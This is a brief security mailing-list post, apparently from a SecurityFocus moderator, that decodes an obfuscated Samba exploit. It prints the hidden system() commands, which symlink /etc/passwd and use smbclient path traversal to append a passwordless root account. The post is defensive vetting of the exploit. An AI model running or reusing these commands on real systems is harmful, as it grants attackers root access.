Hey,
There is some confusion about the Samba exploit. It is an obfuscated
exploit for an old vulnerability in the Samba daemon. Before approving it
to the list, I checked it.
The system() calls:
system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);
Try this:
printf("%s\n%s\n%s\n",inject1,inject2,inject3a);
output:
/bin/rm -rf /tmp/x.log
/bin/ln -s /etc/passwd /tmp/x.log
/usr/bin/smbclient //localhost/"
fd::0:0::/:/bin/sh\n" -n ../../../tmp/x -N
I am not sure why they chose to write the exploit this way.
Regards,
Dave Ahmad
SecurityFocus
www.securityfocus.com
